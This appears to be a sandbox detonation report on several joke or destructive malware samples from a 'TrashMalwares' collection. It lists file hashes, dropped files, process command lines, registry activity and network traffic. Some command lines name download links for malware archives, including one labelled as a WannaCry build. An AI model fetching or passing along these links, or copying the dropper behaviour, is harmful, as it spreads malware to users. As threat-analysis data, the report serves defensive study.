C:\Users\Admin\AppData\Local\Temp\B882.tmp\txtout2.exe
| MD5 | 21d90b4350b6c69d01174240997806c3 |
| SHA1 | ca6cdfe5f7f0a15ca177eabf7596d64bc284215c |
| SHA256 | ecadb0f872cf2c112620e0bfdb9f657dd5ac25188c762b2ed7261f9612163757 |
| SHA512 | 1e8089c7c6f1660652b29ab5a5ccac7a51dfa5fa2e28144df5a196b232b4ac489d5eee7e873144365004b76995ce8315d29f7af5ffc90130b61c38a06f1966a7 |
memory/488-131-0x0000000000400000-0x000000000041D000-memory.dmp
memory/4176-132-0x0000000000400000-0x000000000041D000-memory.dmp
memory/4452-133-0x0000000000400000-0x000000000040A000-memory.dmp
memory/560-134-0x0000000000400000-0x000000000041D000-memory.dmp
memory/3492-135-0x0000000000400000-0x000000000041D000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:34
Platform
win10v2004-20240226-en
Max time kernel
140s
Max time network
163s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemUpdateInstalled\installer.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File opened for modification | C:\Windows\SystemUpdateInstalled | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File created | C:\Windows\SystemUpdateInstalled\__tmp_rar_sfx_access_check_240610000 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File created | C:\Windows\SystemUpdateInstalled\doom.bat | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File opened for modification | C:\Windows\SystemUpdateInstalled\doom.bat | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
| File created | C:\Windows\SystemUpdateInstalled\installer.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3288 wrote to memory of 4084 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3288 wrote to memory of 4084 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3288 wrote to memory of 4084 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Install Windows20.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\SystemUpdateInstalled\doom.bat" "
Network
| Country | Destination | Domain | Proto |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
Files
C:\Windows\SystemUpdateInstalled\doom.bat
| MD5 | 87ff7a4be8ba06c3d469b27fc8d665bc |
| SHA1 | 2ddb2e14bb115a85b13cfbe6204a45360c78de04 |
| SHA256 | c5e12fc8cceb6155d5176025c3aeff5e3d8aef8e54e6eabf5af43f19329a634b |
| SHA512 | 38a8d7ccc7f447b9e7b61d7f876a4f6de9782b09d1491e93bd0fcd3e15b6552cd6cfe015b020686eecea14a0951ed392abae55490b55af9c393eb02530632c35 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:34
Platform
win10v2004-20240226-en
Max time kernel
132s
Max time network
173s
Command Line
Signatures
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Ginxide.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Ginxide.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Ginxide.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2560 -ip 2560
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 216
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | | tcp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
Files
memory/2560-0-0x0000000000400000-0x000000000042F000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240220-en
Max time kernel
8s
Max time network
16s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Media\PCshakingv4.0.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Media\\logotip.jpg" | C:\Windows\Media\PCshakingv4.0.exe | N/A |
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Media\PCshakingv4.0.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2292 wrote to memory of 2640 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
| PID 2292 wrote to memory of 2640 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
| PID 2292 wrote to memory of 2640 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
| PID 2292 wrote to memory of 2640 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe | C:\Windows\Media\PCshakingv4.0.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\PC shaking v4.0.exe"
C:\Windows\Media\PCshakingv4.0.exe
"C:\Windows\Media\PCshakingv4.0.exe"
Network
Files
\Windows\Media\PCshakingv4.0.exe
| MD5 | 129c1a8094f0a6a9cdc9f63e86f8a482 |
| SHA1 | 917c6809ae03670edbf5da4cb19c49e85390642c |
| SHA256 | 2eadcdfd00b8bec4d18b71830cd334569844002a7971c56d3e1e38ff7972c4f3 |
| SHA512 | 076cf44955bebbad12ca905a36a12da4cd20520d8795e2f47f972ad996932731be4f007792954c9737b68330cd395a17ad19aa1e5b1c9e248379c37dcdf1a9e5 |
C:\Windows\Media\mouse.ico
| MD5 | 3abff26e58afe2b94ce801295336bf82 |
| SHA1 | b3222e30303115469b5b3e3d03ed9aed846d830f |
| SHA256 | fb078b09259f96b032dce2c345c683b6b9d9316819dc363edd780b91dc11704d |
| SHA512 | ba546709378b529eb8887cc5f7ff9f4bc587bae61af009adf8778dc3972c2e57d9291df6f2b6cc8ba36b27c262b8eb6f650d610fc1d731c154bb4cad6df46ac2 |
\??\c:\Windows\Media\Tobu.wav
| MD5 | 27380a8a6026509510e715efb0e31513 |
| SHA1 | fa1307df97f5870d64d4f7d7941603ccb4507196 |
| SHA256 | 62282c6476f26088c1c5751a966098dc98e083cbdad456c8293dae62d4f8106f |
| SHA512 | 4aa7fd31848e1379550dfcecaa6fd8ee125841763d331c5b94388212c628b73df50c806d9da95323ea9d54eb57e97077562f5f973b55cadb80d888d9d819f27e |
C:\Windows\Media\logotip.jpg
| MD5 | 9a9db1db236b2b45a432a622bd161b87 |
| SHA1 | c51683ae43ec4ec9ec6cece0e12ca0ab7364f931 |
| SHA256 | 6d277f338cf460691f023946ecd56a0aa0ee27efaa98d3a29a2518a5c9fa3677 |
| SHA512 | dfd9e25f0fd2adccf6b52aed5d1ffdcf05de198368f42597658a6955e3797edde300553b34d1c24164e1af73533f8b18b1a6a506aceca8ab58f1f8006d1c3dbb |
Analysis: behavioral10
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:36
Platform
win10v2004-20240226-en
Max time kernel
159s
Max time network
256s
Command Line
Signatures
Downloads MZ/PE file
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 208541.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Antivirus_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Antivirus_Installer.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DCCE.tmp\DCCF.tmp\DCD0.bat C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Antivirus_Installer.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=oAkRBqxm8tM
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=lPySS7mt4eo
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://custom-gwent.com/cardsBg/1efae8b0c69810654f16b400426049fd.jpeg
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.protegent360.com/softwares/PAVSetup.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=ymbw2R3uIqc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://files.fm/f/hfkwsdkmj
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://download2389.mediafire.com/xzhsf9dl17ng/9f8fds9s3efg7so/WannaCry+by+Rafael.rar
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/959038855737147432/967723261284724796/Setup_File_Pass_1234.rar
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/959038855737147432/967723261284724796/Setup_File_Pass_1234.rar
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff759146f8,0x7fff75914708,0x7fff75914718
Network
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 18.201.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.36.246.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.99.211.52.in-addr.arpa | udp |
| FR | 15.188.219.54:80 | g.ezoic.net | tcp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\DCCE.tmp\DCCF.tmp\DCD0.bat
| MD5 | 6882363dd125a39e084667ddd43532a4 |
| SHA1 | a5b6e74b292d96424d7b39ee9f71e98701f4548d |
| SHA256 | b998f488ff63337265c33a7e298e85679393d54e6094d223cd97e549a17078ba |
| SHA512 | 7bec550ded2c532f279638050638db8abe48f7a31f1175a8caf34dd6ff4ccddfc01331211088ab0b2e3fe980846657f609a897be88eace28c0347f56d7b91a19 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 1e3dc6a82a2cb341f7c9feeaf53f466f |
| SHA1 | 915decb72e1f86e14114f14ac9bfd9ba198fdfce |
| SHA256 | a56135007f4dadf6606bc237cb75ff5ff77326ba093dff30d6881ce9a04a114c |
| SHA512 | 0a5223e8cecce77613b1c02535c79b3795e5ad89fc0a934e9795e488712e02b527413109ad1f94bbd4eb35dd07b86dd6e9f4b57d4d7c8a0a57ec3f7f76c7890a |
\??\pipe\LOCAL\crashpad_740_ASNHTARLTNPOXQGP
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 36bb45cb1262fcfcab1e3e7960784eaa |
| SHA1 | ab0e15841b027632c9e1b0a47d3dec42162fc637 |
| SHA256 | 7c6b0de6f9b4c3ca1f5d6af23c3380f849825af00b58420b76c72b62cfae44ae |
| SHA512 | 02c54c919f8cf3fc28f5f965fe1755955636d7d89b5f0504a02fcd9d94de8c50e046c7c2d6cf349fabde03b0fbbcc61df6e9968f2af237106bf7edd697e07456 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0ad4ee0141cde3619577aa6284373e4a |
| SHA1 | 3ab357a94fcd0082917967933debe1092c720795 |
| SHA256 | 357eeac43f451f41c9f7bc271567bcc85a197571c3dd60025615a37f7425e25a |
| SHA512 | 92cbaf0b484dcccae03d44b23200386fdebbb477fd4acfb09f34989efcb369f2510637e1b4dad46b129e196d9722bba2819806f8f3ad578d4d484e62fcf871bf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 62d58388cee158390aee2e922ad8fc8a |
| SHA1 | d828fa3b27eb6eccaa4bed8a32262a73057631c0 |
| SHA256 | b56934f2d515f1a4632841927ef435ae4b78ee332836f1e15b6b954fc63fbbb8 |
| SHA512 | a972634aff9a658b6e64052c77e27c6f37b1b7de03023ec96ee898993f05127f8a46fe06d44988d26f4967957f431140a68a923be14df8df97b17695731d890f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 838a7b32aefb618130392bc7d006aa2e |
| SHA1 | 5159e0f18c9e68f0e75e2239875aa994847b8290 |
| SHA256 | ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa |
| SHA512 | 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13353885193125083
| MD5 | 128b53fc2d526f2d1ee7ce4a11bd907d |
| SHA1 | da497f43cbc0f7bceb94187a8c37775343038ee5 |
| SHA256 | 69353cf31c9d5406374f5c60e45ccaff091acd558a5ecd4462371955aa208524 |
| SHA512 | 439f48eb1554e15d50fe092c796425815107fa2557efe5bf38f86ada228694e1e95d46f846ff12c923d799d328a137d562bf25de168f44ef5041df306c0221e4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13353885193925083
| MD5 | 46e511ee32bfa006164e2cd10f354868 |
| SHA1 | f3126d58922abff380516179801dc9083e0106c7 |
| SHA256 | 2721c4f40399439d4e8db2fd6f07571776708f8e0ab046b75ec293a788515743 |
| SHA512 | f691ef22f3a2d0e4060430a7bbf0de9999fd5e1f8c01378493c0fb72a55bf276fe9c066c7240fbe134391db124955be3f3fd687d6a53af1d68abc0bf017988cc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG
| MD5 | 9c5defa4ccef814d628965bc1a843520 |
| SHA1 | 2cb58a38b9a27721871bad1c4148eedc303488ae |
| SHA256 | 372e3744093f5a4f2016c0bdd39264339c1b73fad9f2fbd83c0b183b0c8b271e |
| SHA512 | fb9286d2f0a7b0ea5b861224253d3cc74486268fbe2d258221b459f8a88dfb6e7a5f1cec033a3dbaa88f8e7ec4609a03a7ed8a6cc735a668fd902c08e72a26aa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | 6c541c15bacd30cd67b91dd1745ea809 |
| SHA1 | f0e6a8ebcb7a1f13644317c46dbf7560ba0318ab |
| SHA256 | 05cf5d29bd984d6a8180b6bba8327bab19d6c711709f52d7215b99389ad894ed |
| SHA512 | 57254dc2f40b0c16120ff6c011fb34fc555589f5a9116e2711f36f04b9c4d9e8165c35792a360a617e911f22dcaca9d6ee6c16a0adec412e76f61feb87c1d237 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal
| MD5 | c267930c2a88e164828dd8d0a4933c74 |
| SHA1 | d18af9909cfb44ee3ad7557b9c90fb683966ec92 |
| SHA256 | 54a2c37ecfa57973eb82ef0a28f29fdad1771e2768429d77701839a4d1c927bb |
| SHA512 | 3a014d44a828e193c6d9920e7bd6a46693c966f612890f2d28411b341ea02a7dac6fe3a80ade64fa861661c751fb2f29ef611c689e21baa59725a3c2c50a6693 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG
| MD5 | b2b065ca79fdd521c559229ff45fea9b |
| SHA1 | fa9678dfe7244f7f641c7acdfc49552bc40bbc29 |
| SHA256 | 29b40f3f708febb5a8bbf7b121471f072267ea1d3c06406986f812201be1608c |
| SHA512 | c12f8ee23c11a8143a41aaebc0bd6567d880f2d3aaa862cf8a4edee3c6a259cd1ad4f912816ba59948cdd950cf1c9e17fea86911a238d0e238be60a94609365c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
| MD5 | 876470cfd40f2d195f3ca46cec51f87a |
| SHA1 | f3ce7cf41a4ba2da291024410ccd26424a7cb4c2 |
| SHA256 | e76b4d97171602f28448cac0cb619b85734d2b1cb89fb6297caf594675e43e42 |
| SHA512 | ae24bebdbd6e2dace8c5a7622e63d865fab181067337de5750f2d0c30ed184595d1a3507283f87061455394670179464347ab7581efe696ff2b69d5a3513e8a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
| MD5 | 1132832de7574d1b208ca6c6a195f005 |
| SHA1 | e37577d3ccd1894efb3cbd0145d47ca786180cd0 |
| SHA256 | 044c3b77503ab1d9fc5f1aee98122ef8a3b6c8998eff9b16b66d3315de00a03b |
| SHA512 | 7e8537607b77c0cb530ab6e9fd9f69ed22944de864e37c508083be430e446b8407b7b0b19d91b52da51247d3110b7ed59c997fb307e97030d84f510016de05e0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
| MD5 | dbb805a0ebd21bca3d0aa93ccd995326 |
| SHA1 | d839471308547b9fba1fdb2d4d9a120df099367b |
| SHA256 | 218e73d1cc5296bbf8382d9951d4ce0740edb39dee874b2b93e1e3c34115440d |
| SHA512 | 878fffc094ed461d24088ec641c317044cbd25deb24dc19d2c24d5d90104819c1c45e9d65aee4a188969ecd4ff98a20b93db13e877e024079cc5e8016a4ba879 |
